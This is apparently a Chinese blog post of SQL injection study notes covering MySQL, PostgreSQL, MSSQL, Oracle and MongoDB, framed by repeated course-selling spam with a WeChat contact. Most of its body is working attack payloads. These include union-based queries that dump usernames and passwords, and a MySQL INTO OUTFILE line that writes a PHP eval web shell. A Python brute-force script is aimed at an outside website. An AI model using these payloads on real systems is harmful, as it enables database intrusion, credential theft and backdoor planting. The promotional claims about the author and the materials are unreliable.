安全基础~通用漏洞1,2024网络安全大厂面试集合

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

#猜表名
and exists (select * from admin)

#猜列名
and exists (select user_name from admin)

#查数据:
1.确定长度
and (select top 1 len(user_name ) from admin)=5(user_name 的长度=5,正常则=5,也可以用>,<号去判断)
2.确定asc数据(asc编码)
and (select top 1 asc(mid(user_name ,1,1)) from admin)=97 判断第一位(97代表‘a’的ascll值)
and (select top 1 asc(mid(user_name ,2,1)) from admin)=97 判断第二位

(user_name =admin 第一位a 第二位d 第三位m 第四位i 第五位n pass_word=a48e190fafc257d3)


**判断有无注入**  
 总结4种方法  
 粗略型:提交单引号’ 参数值-1  
 逻辑型(数字型注入):and 1=1 / and 1=2  
 逻辑型(字符型注入):’ and ‘1’=‘1 / ’ and ‘1’=‘2  
 逻辑型(搜索型注入):%’ and 1=1 and ‘%’=’% / %’ and 1=2 and ‘%’='%


[示例方法等参考]( )


## MySQL数据库


有sql-lab靶场实验,会写到



MYSQL 统一管理
最高数据库用户=root用户
数据库A=网站A=数据库用户A
表名
列名
数据
数据库B=网站B=数据库用户B
数据库C=网站C=数据库用户C

为了网站和数据库的安全性,MYSQL内置有ROOT最高用户,划分等级,每个用户对应管理一个数据库,这样保证无不关联,从而不会影响到其他数据库的运行。
MYSQL两种思路:
非ROOT的注入攻击:常规类的猜解
ROOT用户的注入攻击:文件读写操作,跨库查询注入等
黑盒测试中可以采用user()获取当前用户权限,白盒中看连接用户即可!
MYSQL5.0以上版本:自带的数据库名information_schema


**获取相关数据:**


1、数据库版本-看 **是否符合information\_schema查询**-`version()`-5.5.53  
 2、数据库用户-看 **是否符合ROOT型注入攻击**-`user()`-root@localhost  
 3、当前操作系统-看 **是否支持大小写或文件路径选择**-`@@version_compile_os`-win  
 4、数据库名字-为后期 **猜解指定数据库下的表**,列做准备-`database()`-syguestbook


看小迪的爆破’xhcms’,有学习的地方  
 脚本



版本不对是5版本以下,这个时候只能暴力破解

import requests
import base64
url=‘http://www.comresearch.org/researchDetails.php?id=’
sqlin='1 union select 1,2,3,4,5,6,7 from ’
for lieming in open(‘common-tables.txt’):
lieming=lieming.strip()
s=sqlin+lieming
ss=base64.b64encode(s.encode(‘utf-8’)) # 这里形成的是字节码,所以下面要解密字节码
#print(lieming)
sqlins=url+ss.decode(‘utf-8’)
#print(sqlins)
sss=requests.get(sqlins)
if ‘Warning’ in sss.text:
print(‘失败’)
else:
print(‘成功’)
print(sqlins)


**数据库中文件操作:**


 需要有文件读取的权限,也就是root权限


读取文件:`select load_file('d:/www.txt');`  
 写入文件:`select 'xxx' into outfile 'd:/1.txt';`


读取关键配置文件:`http://127.0.0.1:8081/web/mysql/news.php?id=1 UNION SELECT 1,load_file('D:\\phpstudy_pro\\WWW\\web\\mysql\\config\\conn.php'),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17`  
 后门代码:  
 `http://127.0.0.1:8081/web/mysql/news.php ?id=1 UNION SELECT 1,'<?php eval($_POST['cmd']);?>',3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 into outfile 'D:\\phpstudy_pro\\WWW\\web\\mysql\\3.php'`  
 路径获取:phpinfo,报错,字典等


无法写入:`secure_file_priv`突破 //限制读写的路径 ,注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连接上对方数据库来绕过


set global slow\_query\_log=1


set global slow\_query\_log\_file=‘shell路径’


select ‘<? php eval($\_GET[A] ?>’ or SLEEP(11);


关于文件读取和写入请参考文章:<http://www.taodudu.cc/news/show-4259716.html?action=onClick>


## PostgreSQL-高权限读写注入


-测列数:



order by 4
and 1=2 union select null,null,null,null


-测显位:第2,3



and 1=2 union select ‘null’,null,null,null 错误
and 1=2 union select null,‘null’,null,null 正常
and 1=2 union select null,null,‘null’,null 正常
and 1=2 union select null,null,null,‘null’ 错误


![EG1](https://img-blog.csdnimg.cn/direct/be127c655ae64fa4a5c65dbcec26e1da.png)  
 -获取信息:



and 1=2 UNION SELECT null,version(),null,null
and 1=2 UNION SELECT null,current_user,null,null


![EG2](https://img-blog.csdnimg.cn/direct/fecd9ab34b494b13a25654d3098818a5.png)  
 – 爆库



and 1=2 union select null,current_database(),null,null # 当前数据库
and 1=2 union select null,string_agg(datname,‘,’),null,null from pg_database #所有数据库


![EG3](https://img-blog.csdnimg.cn/direct/e31f3e0017d94542aff236091bb3b545.png)  
 ![EG4](https://img-blog.csdnimg.cn/direct/601bb17e5cbf47d2881c20b349a62e1c.png)  
 -获取表名:



and 1=2 union select null,string_agg(tablename,‘,’),null,null from pg_tables where schemaname=‘public’
and 1=2 union select null,string_agg(relname,‘,’),null,null from pg_stat_user_tables


![eg5](https://img-blog.csdnimg.cn/direct/58ec36520aec471c843a5f5034e3fd27.png)  
 -获取列名:



and 1=2 union select null,string_agg(column_name,‘,’),null,null from information_schema.columns where table_name=‘reg_users’


![eg6](https://img-blog.csdnimg.cn/direct/16ff3b1eac2b4d30aab2810a13030817.png)  
 -获取数据:



and 1=2 union select null,string_agg(name,‘,’),string_agg(password,‘,’),null from reg_users


![eg7](https://img-blog.csdnimg.cn/direct/b0dc866ca5b34e278c9263a641bd5e1b.png)  
 参考:<https://www.freebuf.com/sectool/249371.html>  
 -补充-获取dba用户(同样在DBA用户下,是可以进行文件读写的):



and 1=2 union select null,string_agg(usename,‘,’),null,null FROM pg_user WHERE usesuper IS TRUE


![EG8](https://img-blog.csdnimg.cn/direct/216afb29115544d7a77e47b122373985.png)


## MSSQL-sa高权限读写执行注入


-测列数:



order by 4
and 1=2 union all select null,null,null,null


-测显位:



and 1=2 union all select null,1,null,null
and 1=2 union all select null,null,‘s’,null


db\_name() 当前数据库名字  
 user、system\_user,current\_user,user\_name 获取当前用户名  
 @@SERVERNAME 获取服务器主机信息  
 @@version 获取版本信息  
 ![TEST2](https://img-blog.csdnimg.cn/direct/c4f4380d8cd141d69f9174728d15427e.png)


![TEST1](https://img-blog.csdnimg.cn/direct/0345ddfd78fb4b1abb1674ecb5d7b502.png)



and 1=2 union all select null,db_name(),null,null


-获取表名:



and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’),null,null
union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’ and name not in (‘manage’)),null,null


-获取列名:



and 1=2 union all select null,(select top 1 col_name(object_id(‘manage’),1) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id(‘manage’),2) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id(‘manage’),3) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id(‘manage’),4) from sysobjects),null,null


![TEST3](https://img-blog.csdnimg.cn/direct/343d1493029e4b9fb280e796056a2ec1.png)


-获取数据:



and 1=2 union all select null,username, password ,null from manage


## Oracle 注入


参考文章:<https://www.cnblogs.com/peterpan0707007/p/8242119.html>


测字段:`order by 2`  
 ![step1](https://img-blog.csdnimg.cn/direct/3104282157984276a36492c1cdb01f68.png)  
 查回显:`union select '1','2' from dual`  
 oracle自带虚拟表`dual`  
 ![STEP2](https://img-blog.csdnimg.cn/direct/9ba1bcfbaad54dddbbada244d912d962.png)  
 爆表:`and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual`  
 记录表名字:LOGMNR\_SESSION\_EVOLVE$  
 但是这样查询过于复杂,不适用,所以有下面的模糊爆库  
 ![step3](https://img-blog.csdnimg.cn/direct/85ed7e21943c4a3ea419189241ca382f.png)  
 模糊爆表:`and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual`  
 记录表名:sns\_users  
 ![step4](https://img-blog.csdnimg.cn/direct/d874b09becd04c35af9ff3e1dbe8621b.png)  
 爆列名:`and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual`  
 爆其他列名:`and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')) from dual`  
 ![step5](https://img-blog.csdnimg.cn/direct/0120d6220f6c4566b4ae665272d9f1c1.png)  
 爆数据:`and 1=2 union select user_name,user_pwd from "sns_users"`  
 爆其他数据:`and 1=2 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'`  
 ![STEP6](https://img-blog.csdnimg.cn/direct/3ee05960ead747fe942b23ed9566269d.png)


## Mongodb 注入


参考:<https://www.runoob.com/mongodb/mongodb-query.html>  
 这类型的数据库在python用的比较多。  
 启动靶场,发现关键性代码:  
 `$query="var data=db.notice.findOne({'id':'$id'});return data;";`  
 SQL执行语句,如果没有关键性代码,那么我们很难闭合这个符号,很难去猜解账号密码。  
 ![QUESTION](https://img-blog.csdnimg.cn/direct/b3beb60100f647668378f874dc560b2d.png)  
 如何构造payload?  
 正常写法:`select * from news where id=1`  
 mdb数据库写法:`select * from news where id={('$id')},`需要闭合符号


原始语句:`db.notice.findOne({'id':'$id'});return data;`  
 如果 `?id=1 order by 2`  
 那么语句就会变成:`db.notice.findOne({'id':‘1 order by 2’});return data;,`语句不正确。  
 但是注入语句 `?id=1'}); return ({title:tojson(db),content:'1`  
 那么语句就变成:`db.notice.findOne({'id':‘1'}); return ({title:tojson(db),content:'1'});return data;` ,就可以进行正常的注入。  
 测回显:`/new_list.php?id=1'}); return ({title:1,content:'2`  
 ![step1](https://img-blog.csdnimg.cn/direct/98c05b79f2a146acbfb80d0286f4a03a.png)  
 爆库:  `/new_list.php?id=1'}); return ({title:tojson(db),content:'1`  
 记录数据库:`mozhe_cms_Authority`  
 ![step2](https://img-blog.csdnimg.cn/direct/c9144bcf84c14fbd9c93743cf1fe64f2.png)  
 爆表: `/new_list.php?id=1'}); return ({title:tojson(db.getCollectionNames()),content:'1`


`db.getCollectionNames()`返回的是数组,需要用tojson转换为字符串。  
 记录表名:`"Authority_confidential", "notice", "system.indexes"`  
 ![step3](https://img-blog.csdnimg.cn/direct/a74480502a214f60a5670129308d2b90.png)  
 爆字段:`/new_list.php?id=1'}); return ({title:tojson(db.Authority_confidential.find()[0]),content:'1`


`db.Authority_confidential`是当前用的集合(表),find函数用于查询,0是第一条数据


## sqlmap基础命令



SQLmap使用步骤:
1、判断数据库注入点
2、判断注入点权限

#SQLMAP使用参数:
参考:https://www.cnblogs.com/bmjoker/p/9326258.html
基本操作笔记:-u #注入点
-f #指纹判别数据库类型
-b #获取数据库版本信息
-p #指定可测试的参数(?page=1&id=2 -p “page,id”)

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
[外链图片转存中…(img-fNtAfGPD-1713238172472)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值